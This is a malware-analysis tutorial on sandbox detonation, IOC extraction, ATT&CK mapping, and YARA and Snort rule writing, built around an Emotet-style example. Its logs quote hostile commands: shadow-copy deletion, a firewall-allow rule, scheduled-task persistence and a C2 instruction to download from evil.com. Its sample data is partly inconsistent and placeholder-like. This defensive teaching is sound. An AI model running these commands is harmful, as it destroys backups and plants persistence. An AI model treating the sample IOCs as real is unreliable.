Capabilities Identified: [X] Persistence (Registry Run key) [X] C2 Communication (HTTP to 185.157.82.211) [X] Anti-Debugging (IsDebuggerPresent, RDTSC) [X] VM Detection (VMware I/O backdoor) [X] Process Injection (CreateRemoteThread) [X] Credential Theft (Hooks to GetPasswordA) [ ] Ransomware (No encryption loops detected) [ ] Keylogging (No keyboard hooks)
Stage 5: Dynamic Analysis & Behavioral Analysis
Duration: 1-4 hours
Static analysis reveals what malware can do. Dynamic analysis reveals what it actually does when executed. This stage requires careful sandbox configuration to safely detonate the malware while capturing its behavior.
Step 1: Sandbox Environment Setup
Network Simulation:
Malware often refuses to execute without internet connectivity. Use FakeNet-NG (Windows) or INetSim (Linux) to simulate network services.
FakeNet-NG Configuration:
[HTTPListener]
Enabled: True
Port: 80
Protocol: TCP
ResponseType: Fixed
ResponseFile: response.html
[DNSListener]
Enabled: True
Port: 53
Protocol: UDP
NXDomains: False # Respond to all queries
This configuration:
- Returns fake HTTP responses to any request
- Resolves all DNS queries to the analysis machine
- Prevents malware from detecting sandbox via failed C2
Process Monitoring Setup:
Launch Process Monitor (procmon.exe) with filters:
Include: Process Name is malware.exe
Include: Process Name is cmd.exe (child processes)
Include: Process Name is powershell.exe (child processes)
Include: Operation is RegSetValue (registry changes)
Include: Operation is WriteFile (file creation)
Include: Operation is CreateFile (file access)
Network Capture:
# Start Wireshark capture on all interfaces
wireshark -i any -k -w malware_traffic.pcap
# Or use tcpdump (Linux)
tcpdump -i any -w malware_traffic.pcap
Registry Snapshot:
# Take "before" snapshot
regshot.exe /1st
# Execute malware
# Take "after" snapshot and compare
regshot.exe /2nd /compare
Step 2: Malware Execution and Initial Behavior
Execute the malware and immediately monitor initial actions:
Initial Execution (first 30 seconds):
00:00.001 - malware.exe spawns
00:00.145 - CreateFile: C:\\Users\\Public\\svchost.exe (WRITE)
00:00.187 - WriteFile: C:\\Users\\Public\\svchost.exe (245 KB written - malware copies itself)
00:00.203 - RegSetValue: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdate
Data: "C:\\Users\\Public\\svchost.exe"
00:00.298 - CreateProcess: cmd.exe /c schtasks /create /tn "WindowsUpdate" /tr "C:\\Users\\Public\\svchost.exe" /sc onstart
00:00.412 - Scheduled task created successfully
00:00.501 - InternetOpenA: User-Agent "Mozilla/5.0..."
00:00.687 - DNS Query: update.adobe-flash-player.com
00:00.701 - DNS Response: 185.157.82.211 (FakeNet spoofed response)
00:00.798 - TCP SYN: 185.157.82.211:80
00:00.823 - HTTP GET: /gate.php?id=DESKTOP-ABC123
00:01.104 - HTTP Response: 200 OK (FakeNet dummy response)
Analysis:
- Persistence: Registry Run key + Scheduled task (dual persistence)
- Propagation: Copies self to
C:\\Users\\Public\\svchost.exe(masquerading as legitimate Windows process) - C2 Communication: Contacts
update.adobe-flash-player.com(typosquatting legitimate domain) - Host Identification: Sends computer name in GET parameter
Step 3: File System Activity Analysis
Created Files:
C:\\Users\\Public\\svchost.exe (245,760 bytes) - Malware copy
C:\\Users\\Public\\config.dat (1,024 bytes) - Encrypted configuration
C:\\Users\\<User>\\AppData\\Local\\Temp\\~DF2E.tmp (847,234 bytes) - Downloaded payload
C:\\Users\\<User>\\Desktop\\README.txt (2,145 bytes) - Ransom note (if ransomware)
Modified Files:
C:\\Users\\<User>\\Documents\\*.docx - Encrypted to *.docx.locked
C:\\Users\\<User>\\Pictures\\*.jpg - Encrypted to *.jpg.locked
C:\\Windows\\System32\\drivers\\etc\\hosts - Modified (redirect antivirus update domains)
Deleted Files:
C:\\Users\\<User>\\AppData\\Local\\Temp\\malware.exe - Original file deleted (anti-forensics)
Volume Shadow Copies - Deleted via "vssadmin delete shadows /all /quiet"
Step 4: Registry Modifications
Persistence Keys:
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
Name: WindowsUpdate
Type: REG_SZ
Data: C:\\Users\\Public\\svchost.exe
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce
Name: System
Type: REG_SZ
Data: C:\\Windows\\Temp\\payload.exe
HKLM\\System\\CurrentControlSet\\Services\\MalwareService
Type: REG_DWORD
Start: 2 (Automatic start)
ImagePath: C:\\Windows\\System32\\malware.sys
Windows Defender Exclusions:
HKLM\\Software\\Microsoft\\Windows Defender\\Exclusions\\Paths
Name: C:\\Users\\Public\\
Type: REG_DWORD
Data: 0 (excluded from scanning)
COM Hijacking:
HKCU\\Software\\Classes\\CLSID\\{GUID}\\InProcServer32
Default: C:\\Users\\Public\\malware.dll
(Hijacks legitimate COM object to load malicious DLL)
Step 5: Network Traffic Analysis
DNS Queries:
Query 1: update.adobe-flash-player.com → 185.157.82.211
Query 2: downloads.microsoft-update.com → 195.154.146.35
Query 3: api.telegram.org → 217.182.143.207 (exfiltration channel)
Query 4: xjkdh28f.com → NXDomain (DGA-generated, not yet registered)
HTTP Traffic Breakdown:
Beacon 1 (Initial check-in):
GET /gate.php?id=DESKTOP-ABC123&os=Win10&av=Windows%20Defender HTTP/1.1
Host: 185.157.82.211
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Connection: close
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 47
sleep:60|download:hxxp://evil.com/payload2.exe
Analysis: Malware identifies itself, reports OS/AV, receives commands to sleep 60 seconds and download second-stage payload.
Beacon 2 (Data exfiltration):
POST /upload.php HTTP/1.1
Host: 217.182.143.207
Content-Type: application/octet-stream
Content-Length: 145923
[...binary data containing stolen credentials...]
HTTPS Traffic:
If using HTTPS, decrypt with:
- Wireshark SSL/TLS key logging (if available)
- Proxy through Burp Suite or mitmproxy
- Memory dump of SSL keys from malware process
Step 6: Process Activity and Injection
Process Tree:
malware.exe (PID 1234)
├─ cmd.exe (PID 1456) - schtasks command
│ └─ schtasks.exe (PID 1489)
├─ powershell.exe (PID 1501) - Download second stage
│ └─ curl.exe (PID 1567)
└─ explorer.exe (INJECTED - PID 892) - Malware injected into legitimate process
Injection Detection:
Process Hacker shows:
explorer.exe (PID 892)
Modules:
- explorer.exe (legitimate)
- malware.dll (UNSIGNED - loaded at 0x10000000)
Threads:
- Thread 1-8: Started by explorer.exe (legitimate)
- Thread 9: Started by CreateRemoteThread from malware.exe (SUSPICIOUS)
Memory Regions:
- 0x10000000-0x10040000: RWX (Read+Write+Execute - SUSPICIOUS)
The RWX (writable + executable) memory region is a red flag for code injection.
Step 7: Memory Dump Analysis
Dump malware process memory for additional analysis:
# Using Process Hacker
Right-click malware.exe → Miscellaneous → Dump Process
# Using procdump (Sysinternals)
procdump.exe -ma 1234 malware_dump.dmp
Memory Dump Analysis with Volatility:
# Identify profile
volatility -f malware_dump.dmp imageinfo
# List processes
volatility -f malware_dump.dmp --profile=Win10x64_19041 pslist
# Extract process
volatility -f malware_dump.dmp --profile=Win10x64_19041 procdump -p 1234 -D output/
# Scan for injected code
volatility -f malware_dump.dmp --profile=Win10x64_19041 malfind -p 1234
Extracted Artifacts:
Decrypted C2 configuration:
- C2 servers: 185.157.82.211, 195.154.146.35, 217.182.143.207
- RC4 key: "Sup3rS3cr3tK3y!"
- Exfiltration interval: 3600 seconds (1 hour)
- Target file extensions: .docx, .xlsx, .pdf, .pptx, .zip
Credentials stored in memory:
- username: admin / password: P@ssw0rd123
- RDP session: 192.168.1.50
- Email: [email protected] / password: SecurePass!
Step 8: System-Wide Impact
Service Installation:
Service Name: WindowsUpdateService
Display Name: Windows Update Manager
Description: Manages system updates and security patches
Type: WIN32_OWN_PROCESS
Start Type: AUTOMATIC
Binary Path: C:\\Windows\\System32\\malware.exe
Firewall Rules:
# Malware creates inbound rule to allow C2 callbacks
netsh advfirewall firewall add rule name="Windows Update" dir=in action=allow program="C:\\Users\\Public\\svchost.exe" enable=yes
Scheduled Tasks:
Task Name: WindowsUpdate
Trigger: At system startup
Action: C:\\Users\\Public\\svchost.exe
Run Level: Highest (administrator privileges)
User Account Creation:
Username: support
Password: <random 32-character string>
Group Membership: Administrators
Hidden: Yes ($ suffix: support$)
Stage 5 Deliverables
-
Sandbox Execution Report
- Timeline of all activities (file/registry/network)
- Screenshots of malware behavior
- Error messages and crash dumps
-
Network PCAP Analysis
- C2 infrastructure identified (IPs, domains)
- Communication protocol analysis
- Exfiltrated data summary
-
File System Timeline
- All created/modified/deleted files with timestamps
- File hash values
- Dropped payloads extracted
-
Process Tree Diagram
- Parent-child process relationships
- Injection targets identified
- Command-line arguments captured
-
Memory Dump Analysis
- Decrypted configurations
- Extracted credentials
- Injected code artifacts
Stage 6: Threat Intelligence Correlation & IOC Sharing
Duration: 30-90 minutes
The final stage correlates analysis findings with global threat intelligence, attributes the malware to known threat actors or campaigns, and shares IOCs with the security community.
Step 1: Malware Family Identification
Use behavioral signatures to identify the malware family:
Emotet Indicators:
- Email-based delivery with malicious Office macros
- PowerShell dropper downloading from compromised WordPress sites
- Loads banking trojans (TrickBot, QakBot)
- Registry persistence via Run key
- C2 communication over HTTP/HTTPS to rotating infrastructure
- Modular architecture (loader + plugins)
Ryuk Ransomware Indicators:
- Delivered via TrickBot or Emotet
- Disables Windows Defender and Volume Shadow Service
- Lateral movement via PsExec and WMI
- AES-256 + RSA-2048 encryption
- README.txt ransom note in each encrypted directory
- Demands Bitcoin payment to Tor-based portal
- Targets enterprise networks (not individual users)
Cobalt Strike Beacon Indicators:
- Legitimate red team tool repurposed by attackers
- Process hollowing injection into legitimate processes
- HTTPS C2 with malleable profiles (customizable traffic patterns)
- Sleep with jitter to evade network monitoring
- Multiple anti-debugging and VM detection checks
- Staged payloads (stager downloads full beacon)
Step 2: MITRE ATT&CK Framework Mapping
Map observed behaviors to MITRE ATT&CK tactics and techniques:
Execution:
- T1059.001: Command and Scripting Interpreter: PowerShell
- T1059.003: Command and Scripting Interpreter: Windows Command Shell
Persistence:
- T1547.001: Boot or Logon Autostart Execution: Registry Run Keys
- T1053.005: Scheduled Task/Job: Scheduled Task
- T1543.003: Create or Modify System Process: Windows Service
Privilege Escalation:
- T1055.001: Process Injection: Dynamic-link Library Injection
- T1055.012: Process Injection: Process Hollowing
Defense Evasion:
- T1140: Deobfuscate/Decode Files or Information
- T1562.001: Impair Defenses: Disable or Modify Tools (Windows Defender)
- T1070.001: Indicator Removal on Host: Clear Windows Event Logs
- T1036.004: Masquerading: Masquerade Task or Service
Credential Access:
- T1003.001: OS Credential Dumping: LSASS Memory
- T1056.001: Input Capture: Keylogging
Discovery:
- T1082: System Information Discovery
- T1083: File and Directory Discovery
- T1057: Process Discovery
Collection:
- T1005: Data from Local System
- T1113: Screen Capture
Command and Control:
- T1071.001: Application Layer Protocol: Web Protocols (HTTP/HTTPS)
- T1573.001: Encrypted Channel: Symmetric Cryptography (RC4)
- T1568.002: Dynamic Resolution: Domain Generation Algorithms
Exfiltration:
- T1041: Exfiltration Over C2 Channel
Impact:
- T1486: Data Encrypted for Impact (Ransomware)
- T1490: Inhibit System Recovery (Delete Shadow Copies)
This mapping enables:
- Comparison with other malware using similar techniques
- Detection rule development targeting specific TTPs
- Red team emulation of real-world threats
- Gap analysis of defensive controls
Step 3: Threat Intelligence Correlation
Query threat intelligence platforms for similar samples and campaigns:
VirusTotal Intelligence:
Search: behavior:network AND network:"185.157.82.211"
Results: 247 samples communicating with same C2
First seen: 2021-03-12
Last seen: 2024-01-15
Common family: Emotet (epoch 5)
Related campaigns: TA542 phishing operations
AlienVault OTX:
Indicator: 185.157.82.211
Pulses: 12 related threat reports
Tags: Emotet, banking-trojan, botnet
Malware families: Emotet, TrickBot, QakBot
Threat actor: TA542 (Mummy Spider)
Abuse.ch MalwareBazaar:
Hash: 8d969eef6ecad3c29a3a629280e686cf...
Signature: Emotet
Confidence: 100%
YARA rules: 5 matches
- Emotet_Dropper_Jan2024
- Generic_Packer_UPX
- Suspicious_Registry_Run
- C2_HTTP_Beacon
- Anti_VM_Detection
Hybrid Analysis:
Sample: malware.exe
Threat Score: 100/100 (Malicious)
Verdict: Emotet Trojan
AV Detection: 67/71
Behavioral Summary:
- Drops executable to %PUBLIC%
- Creates registry autorun
- Contacts known Emotet C2 infrastructure
- Downloads second-stage payload
Step 4: Attribution and Campaign Tracking
Based on TTPs, infrastructure, and malware family:
Attribution Assessment:
Malware Family: Emotet
Threat Actor: TA542 (Mummy Spider) - Cybercrime group
Motivation: Financial (credential theft, ransomware delivery)
Targeting: Opportunistic (broad phishing campaigns)
Geography: Global, high volume in US/EU
Active Since: 2014 (reemergence in 2022 after law enforcement takedown)
Infrastructure Characteristics:
- Compromised WordPress sites for payload hosting
- Rotating residential proxy network for C2
- Domain generation algorithm (DGA) for backup C2
- Fast-flux DNS to evade takedown
Delivery Methods:
- Phishing emails with malicious Office documents
- Thread hijacking (replies to existing email threads)
- PDF attachments with malicious links
Typical Kill Chain:
1. Phishing email → Emotet dropper
2. Emotet downloads TrickBot
3. TrickBot provides access for Ryuk ransomware
4. Ryuk encrypts network and demands ransom
Step 5: IOC Compilation and Defanging
Compile all indicators of compromise for sharing:
File Indicators:
MD5: 44d88612fea8a8f36de82e1278abb02f
SHA-1: 3395856ce81f2b7382dee72602f798b642f14140
SHA-256: 8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92
Dropped Files:
- C:\\Users\\Public\\svchost.exe (SHA-256: 7b3f8e9a...)
- C:\\Users\\Public\\config.dat (SHA-256: 2c1a5f3d...)
Network Indicators (Defanged):
C2 Servers:
- hxxp://185[.]157[.]82[.]211/gate.php
- hxxps://195[.]154[.]146[.]35/upload.php
- hxxp://217[.]182[.]143[.]207/api/v1
Domains:
- update[.]adobe-flash-player[.]com
- downloads[.]microsoft-update[.]com
DGA Domains (2025-01-07):
- xjkdh28f[.]com
- plmwq93k[.]net
- zxcvb123[.]org
Host Indicators:
Registry Keys:
- HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdate
File Paths:
- C:\\Users\\Public\\svchost.exe
- C:\\Users\\<User>\\AppData\\Local\\Temp\\~*.tmp
Mutex Names:
- Global\\Emotet_Mutex_2024
Service Names:
- WindowsUpdateService
Behavioral Indicators:
Process Activity:
- malware.exe → powershell.exe -enc <Base64>
- cmd.exe /c schtasks /create /tn "WindowsUpdate"
- vssadmin delete shadows /all /quiet
Network Patterns:
- HTTP POST to /gate.php with computer name in query string
- RC4-encrypted payload in HTTP body
- 60-second beacon intervals
Step 6: YARA Rule Development
Create detection signatures for future identification:
rule Emotet_Jan2025_Variant {
meta:
description = "Detects Emotet trojan variant from January 2025 campaign"
author = "InventiveHQ Security Team"
date = "2025-01-07"
hash = "8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92"
severity = "high"
strings:
// Unique C2 URL pattern
$c2_url = "gate.php?id=" ascii wide
// Registry persistence string
$reg_persistence = "Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run" wide
// XOR decryption loop signature
$xor_decrypt = { 8A 06 32 C3 88 07 46 47 E2 F7 }
// RC4 encryption initialization
$rc4_init = { 33 C9 88 8C 0D ?? ?? ?? ?? 41 81 F9 00 01 00 00 }
// Anti-debug check
$anti_debug = { FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A 00 FF 15 }
condition:
uint16(0) == 0x5A4D and // MZ header
filesize < 500KB and
3 of them
}
Step 7: Snort/Suricata Network Detection Rules
Create IDS signatures:
# Emotet C2 Beacon Detection
alert http any any -> any any (
msg:"Emotet C2 Beacon - gate.php";
flow:established,to_server;
content:"GET";
http_method;
content:"/gate.php";
http_uri;
content:"id=";
http_uri;
content:"Mozilla/5.0";
http_user_agent;
classtype:trojan-activity;
sid:1000001;
rev:1;
)
# Emotet Data Exfiltration
alert http any any -> any any (
msg:"Emotet Data Exfiltration - upload.php";
flow:established,to_server;
content:"POST";
http_method;
content:"/upload.php";
http_uri;
content:"application/octet-stream";
http_header;
classtype:trojan-activity;
sid:1000002;
rev:1;
)
Step 8: STIX 2.1 IOC Sharing
Package IOCs in STIX (Structured Threat Information eXpression) format for automated sharing:
{
"type": "bundle",
"id": "bundle--8d969eef-6eca-d3c2-9a3a-629280e686cf",
"objects": [
{
"type": "indicator",
"id": "indicator--8d969eef-1111-1111-1111-629280e686cf",
"created": "2025-01-07T10:00:00.000Z",
"modified": "2025-01-07T10:00:00.000Z",
"name": "Emotet C2 Server",
"pattern": "[ipv4-addr:value = '185.157.82.211']",
"valid_from": "2025-01-07T10:00:00.000Z",
"labels": ["malicious-activity", "c2-server"]
},
{
"type": "malware",
"id": "malware--8d969eef-2222-2222-2222-629280e686cf",
"created": "2025-01-07T10:00:00.000Z",
"modified": "2025-01-07T10:00:00.000Z",
"name": "Emotet",
"labels": ["trojan", "loader", "banking-trojan"],
"description": "Emotet trojan delivering TrickBot and Ryuk ransomware"
}
]
}
Step 9: Community Sharing
Share defanged IOCs and analysis with:
MISP (Malware Information Sharing Platform):
- Upload STIX bundle
- Tag with: Emotet, TA542, banking-trojan, loader
- Set TLP (Traffic Light Protocol): TLP:AMBER (limited sharing)
AlienVault OTX:
- Create pulse: "Emotet Campaign - January 2025"
- Add all network and file IOCs
- Link to MITRE ATT&CK techniques
MalwareBazaar:
- Submit sample (if not already present)
- Add tags and family classification
- Contribute YARA signatures
Industry ISACs:
- FS-ISAC (Financial Services)
- H-ISAC (Healthcare)
- IT-ISAC (Information Technology)
Stage 6 Deliverables
-
Comprehensive Malware Analysis Report
- Executive summary (non-technical)
- Technical deep-dive (all stages)
- Malware capabilities and impact assessment
- Remediation and prevention recommendations
-
Defanged IOC List (STIX 2.1 format)
- File hashes (MD5, SHA-1, SHA-256)
- Network indicators (IPs, domains, URLs)
- Host indicators (registry, files, services)
- Behavioral patterns
-
MITRE ATT&CK TTP Mapping
- Tactics and techniques observed
- Sub-techniques identified
- Defensive control recommendations per TTP
-
Malware Family Attribution
- Family: Emotet
- Actor: TA542 (Mummy Spider)
- Campaign: Emotet epoch 5
- Confidence level: High (95%)
-
Detection Signatures
- YARA rules (static detection)
- Snort/Suricata rules (network detection)
- Sigma rules (log detection)
- EDR behavioral rules
Tools Summary
InventiveHQ Tools Used in This Workflow
- Machine Code Disassembler - Disassemble x86/x64/ARM machine code to assembly
- Malware Deobfuscator - Deobfuscate PowerShell, JavaScript, VBScript
- String Extractor - Extract ASCII/Unicode strings from binaries
- Entropy Analyzer - Calculate entropy to detect packing/encryption
- Hex Editor - Examine raw binary data and file structures
- File Magic Number Checker - Verify true file type via magic numbers
- Hash Generator - Generate MD5/SHA-1/SHA-256 hashes with VirusTotal integration
- Hash Lookup - Query threat intelligence databases
- IOC Extractor - Extract IP addresses, domains, URLs, cryptocurrency addresses
- Threat Intelligence Feed Aggregator - Correlate IOCs across multiple sources
- URL Defanger - Defang IOCs for safe sharing
Essential External Tools
Disassemblers and Reverse Engineering:
- IDA Pro - Industry-standard disassembler (commercial, $$$)
- Ghidra - NSA's free and open-source RE platform
- Binary Ninja - Modern commercial disassembler
- Cutter - Free GUI for radare2
Debuggers:
- x64dbg - Modern Windows debugger (free)
- OllyDbg - Classic Windows debugger (free, 32-bit only)
- WinDbg - Microsoft's official debugger
- GDB - GNU debugger (Linux)
Sandboxes and Dynamic Analysis:
- Cuckoo Sandbox - Open-source automated malware analysis
- ANY.RUN - Interactive online sandbox (commercial)
- Joe Sandbox - Advanced commercial sandbox
- Hybrid Analysis - CrowdStrike's free sandbox
Monitoring Tools:
- Process Monitor - Sysinternals file/registry/process monitor
- Process Hacker - Advanced process viewer
- Wireshark - Network protocol analyzer
- FakeNet-NG - Network simulation tool
PE Analysis:
- PEStudio - PE file analysis (free)
- PE-bear - PE structure viewer (free)
- Resource Hacker - Extract PE resources
- CFF Explorer - PE editor and inspector
Network Simulation:
- INetSim - Linux internet services simulation
- FakeNet-NG - Windows network simulation
Memory Analysis:
- Volatility - Memory forensics framework
- Rekall - Advanced memory analysis
Analysis Distributions:
- REMnux - Ubuntu-based malware analysis distro
- FlareVM - Windows malware analysis environment
Real-World Case Studies
Case Study 1: Emotet Trojan (8.5 hours)
Initial Sample: invoice_2024.doc (87 KB Office document)
Key Findings:
- Obfuscated VBA macro → PowerShell dropper → UPX-packed DLL
- Modular trojan with 5 plugins (email harvesting, credential theft, loader)
- C2 beaconing to 3 WordPress-compromised sites every 60 seconds
- Downloaded TrickBot second-stage, leads to Ryuk ransomware in 23% of infections
- Attribution: TA542 (Mummy Spider), financial sector targeting
- Shared 47 IP addresses and 123 domains with FS-ISAC
Case Study 2: Ryuk Ransomware (14.5 hours)
Initial Sample: system_update.exe (245 KB, entropy 7.91)
Key Findings:
- Custom packer requiring manual unpacking with x64dbg
- AES-256 + RSA-2048 encryption, targets documents/databases/images
- Deletes Volume Shadow Copies, drops README.txt ransom note
- Encrypted 1,247 test files in 4 minutes, demanded 15 BTC (~$600K)
- Highly targeted (enterprises), hands-on-keyboard operators
- 7-day average dwell time, lateral movement via PsExec
- Recommended: Network segmentation, credential rotation, offline backups
Case Study 3: Cobalt Strike Beacon (13.5 hours)
Initial Sample: update.dll (156 KB, 64-bit DLL)
Key Findings:
- ReflectiveLoader export (Cobalt Strike hallmark)
- XOR-encrypted C2 config, malleable profile mimicking CloudFront traffic
- HTTPS C2 with legitimate SSL, injected into explorer.exe
- Multiple anti-debugging and VM detection checks
- Downloaded Mimikatz and SharpHound for credential dumping/AD enumeration
- Cracked version (watermark 0x12345678), healthcare targeting suspected
- Recommended: Hunt for reflective DLL loading, monitor HTTPS beaconing patterns
Best Practices and Safety Guidelines
Analysis Environment Safety
- Never analyze malware on production systems - Use dedicated, isolated VMs
- Network isolation is critical - Disconnect from corporate networks, use host-only or NAT
- Snapshot before execution - Take VM snapshots at each stage for rollback
- Disposable analysis VMs - Delete and rebuild VMs after each analysis
- No clipboard sharing - Disable clipboard between host and guest
- No file sharing - Transfer samples via isolated network shares or USB (write-once)
Legal and Ethical Considerations
- Legitimate provenance - Only analyze samples from incident response, threat feeds, or malware repositories
- Responsible disclosure - Follow coordinated vulnerability disclosure for 0-days
- Respect licensing - Commercial analysis tools require proper licenses
- Data protection - Handle stolen credentials and PII in memory dumps carefully
- Compliance coordination - Legal/compliance approval before sharing IOCs externally
Documentation and Reporting
- Screenshot everything - Capture every stage for reports and peer review
- Maintain chain of custody - Document sample source, transfer, and analysis
- Version control - Track unpacked binaries, dumps, and configurations with hashes
- Timestamp all activities - Precise timeline aids correlation with incidents
- Peer review - Have findings reviewed by senior analysts before publishing
Operational Security
- Secure sample storage - Encrypt malware samples at rest (password-protected archives)
- Access controls - Limit who can access analysis systems and samples
- Secure communication - Use encrypted channels for sharing IOCs
- Credential hygiene - Never use real credentials in analysis VMs
- Physical security - Analysis systems in secure labs, not coffee shops
Continuous Learning
- Stay current - Malware evolves rapidly; read threat reports weekly
- Practice regularly - Analyze samples from MalwareBazaar, VirusBay
- Learn new tools - Experiment with emerging RE frameworks
- Certifications - GREM (GIAC Reverse Engineering Malware), GCFA (GIAC Certified Forensic Analyst)
- Community engagement - Participate in MISP communities, attend conferences (Black Hat, DEF CON, REcon)
Frequently Asked Questions
1. How do I start learning malware analysis with no prior experience?
Start with fundamentals:
- Learn assembly language (x86/x64) through tutorials like "x86 Assembly Crash Course"
- Understand PE file format (Portable Executable structure)
- Practice with simple samples from beginner malware repositories
- Use automated sandboxes (ANY.RUN, Hybrid Analysis) before manual RE
- Build a safe analysis lab (REMnux + FlareVM in isolated VMs)
- Follow SANS FOR610 course or free alternatives (Malware Unicorn's workshops)
Progression path: Automated triage → Static analysis → Unpacking → Assembly reading → Advanced RE
2. What's the difference between static and dynamic analysis?
Static Analysis:
- Examines malware without executing it
- Safe (no risk of infection)
- Techniques: String extraction, PE analysis, disassembly
- Limitations: Can't observe runtime behavior, defeated by packing/encryption
- Use when: Initial triage, packed samples, extracting IOCs
Dynamic Analysis:
- Executes malware in controlled environment
- Observes actual behavior (file creation, network traffic, registry changes)
- Techniques: Sandboxing, debugging, memory dumps
- Limitations: Requires safe isolation, malware may detect sandbox and alter behavior
- Use when: Understanding functionality, behavioral IOCs, unpacking
Best practice: Combine both approaches for comprehensive analysis.
3. How do I safely analyze malware without infecting my systems?
Isolation layers:
- Virtual Machines: Use VMware/VirtualBox with snapshots
- Network Isolation: Host-only networking (no internet access)
- Disposable Systems: Delete VM after each analysis
- No Host Interaction: Disable clipboard, file sharing, drag-and-drop
- Air-gapped Analysis: Physically isolated network segment
- Cloud Sandboxes: Use ANY.RUN, Joe Sandbox (no local risk)
Safety checklist before execution:
- VM snapshot taken
- Network set to host-only mode
- Monitoring tools running (procmon, Wireshark)
- No production data in VM
- Backdoor access to VM (in case malware blocks normal access)
4. What if the malware detects my analysis environment and doesn't execute?
Common evasion techniques and bypasses:
VM Detection:
- Malware checks for VMware/VirtualBox artifacts
- Bypass: Use bare metal, or anti-anti-VM tools (Pafish, al-khaser)
- Patch: Modify malware binary to NOP out VM detection checks
Sandbox Detection:
- Checks for common sandbox indicators (low file count, generic usernames)
- Bypass: Customize VM (add realistic files, change username, install software)
- Timing: Some malware sleeps for extended periods to evade automated sandboxes
Debugger Detection:
- IsDebuggerPresent(), RDTSC timing, CheckRemoteDebuggerPresent()
- Bypass: Patch anti-debug checks, use anti-anti-debug plugins (ScyllaHide)
- Alternate: Use hardware debuggers (JTAG) instead of software debuggers
Internet Connectivity Checks:
- Malware verifies internet access before activating
- Bypass: Use FakeNet-NG or INetSim to simulate network services
- DNS: Resolve all queries to analysis machine
5. How long does a typical malware analysis take?
Timeline by complexity:
- Simple Scripts (Droppers): 1-2 hours (triage, deobfuscation, IOC extraction)
- Packed Executables (Trojans): 3-6 hours (unpacking, static/dynamic analysis)
- Sophisticated Malware (APT, Ransomware): 8-16 hours (custom unpacking, deep RE, threat intel)
- Novel/Unknown Samples: Days to weeks (custom encryption/protocols, 0-day exploits)
6. What programming languages should I learn for malware analysis?
Essential languages:
- Assembly (x86/x64): Required for reading disassembly output
- Python: Automation, script analysis, tool development
- C/C++: Understanding malware logic (most malware written in C)
- PowerShell: Windows script malware, obfuscation techniques
Helpful languages:
- JavaScript: Web-based malware, browser exploits
- VBScript: Legacy macro malware
- C#/.NET: Modern malware increasingly uses .NET
- Go/Rust: Emerging malware languages (harder to reverse)
Priority: Assembly > Python > C/C++ > PowerShell
7. How do I unpack malware if automated tools don't work?
Manual unpacking methodology:
- Identify packer type: Entropy analysis, section names, entry point behavior
- Set breakpoint on memory allocation: VirtualAlloc, VirtualProtect in x64dbg
- Follow execution flow: Step through unpacking stub
- Locate OEP (Original Entry Point): Look for JMP/RET to allocated memory
- Dump memory: Extract unpacked code from memory at OEP
- Rebuild import table: Use Scylla or ImpREC to fix imports
- Verify unpacking: Check entropy, string extraction, disassembly
Advanced techniques:
- Hardware breakpoints: Break on execute at newly allocated memory
- Memory breakpoints: Break when protection changes to executable
- API monitoring: Log all VirtualAlloc/VirtualProtect calls with parameters
Resources: "Practical Malware Analysis" Chapter 18, OllyDbg unpacking tutorials
8. What are the legal implications of possessing and analyzing malware?
Legal considerations:
Possession:
- Generally legal for legitimate security research, incident response
- Intent matters: Research vs. malicious distribution
- Some jurisdictions restrict possession without authorization
Analysis:
- Legal for defenders analyzing threats to their networks
- Security researchers: Ensure proper authorization and ethical boundaries
- Academic research: Often requires IRB (Institutional Review Board) approval
Sharing:
- IOCs and signatures: Legal and encouraged
- Actual malware samples: Restricted, use password-protected archives
- Exploits: Responsible disclosure, avoid weaponizing for unauthorized use
Best practices:
- Work for legitimate organization (SOC, CERT, security vendor)
- Document business justification for analysis
- Coordinate with legal/compliance teams
- Follow responsible disclosure for vulnerabilities
- Don't distribute malware to unauthorized parties
Recommended reading: "Computer Fraud and Abuse Act" (CFAA), local cybersecurity laws
9. How do I extract decrypted configuration from memory?
Memory extraction techniques:
1. Process Memory Dump:
# Using Process Hacker
Right-click malware.exe → Dump Process
# Using procdump (Sysinternals)
procdump -ma <PID> output.dmp
2. Search for Config Patterns:
# Use strings on memory dump
strings -n 8 output.dmp | grep -E "(http://|https://|[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})"
# Or use Volatility
volatility -f output.dmp --profile=Win10x64 memdump -p <PID> -D ./
3. Set Breakpoint After Decryption:
- Find decryption function in disassembly
- Set breakpoint after decryption completes
- Dump memory region containing config
- Parse config structure manually or with scripts
4. Automated Config Extraction:
- Tools: CAPE Sandbox, Cuckoo config extractors
- YARA rules: Identify config structure in memory
- Community scripts: Many families have published extractors (Emotet, QakBot)
Example - Emotet Config:
Offset 0x0000: C2 Server 1: 185.157.82.211:80
Offset 0x0010: C2 Server 2: 195.154.146.35:443
Offset 0x0020: C2 Server 3: 217.182.143.207:8080
Offset 0x0030: RC4 Key: "Sup3rS3cr3tK3y!"
Offset 0x0050: Campaign ID: "2025_epoch5"
10. What's the best way to identify a malware family?
Identification methods:
1. Hash Lookup:
- Query VirusTotal, MalwareBazaar with SHA-256
- Instant identification if previously seen
2. YARA Rules:
- Run community YARA rules (Florian Roth's signature-base)
- Family-specific signatures
3. Behavioral Signatures:
- Mutex names (unique per family)
- C2 URL patterns
- File drop locations
- Registry persistence methods
4. Code Similarity:
- Fuzzy hashing (ssdeep) for variant detection
- Binary diffing with BinDiff/Diaphora
5. Threat Intel Correlation:
- IOC overlap with known campaigns
- Infrastructure reuse (same C2 servers)
- TTPs matching MITRE ATT&CK profiles
Example - Emotet vs. TrickBot:
| Indicator | Emotet | TrickBot |
|---|---|---|
| Delivery | Phishing emails | Emotet dropper |
| Persistence | Registry Run | Scheduled Task |
| C2 Pattern | HTTP to /gate.php | HTTPS to /[group]/ |
| Mutex | Global\I98B68E3C | Global\TrickBot{unique} |
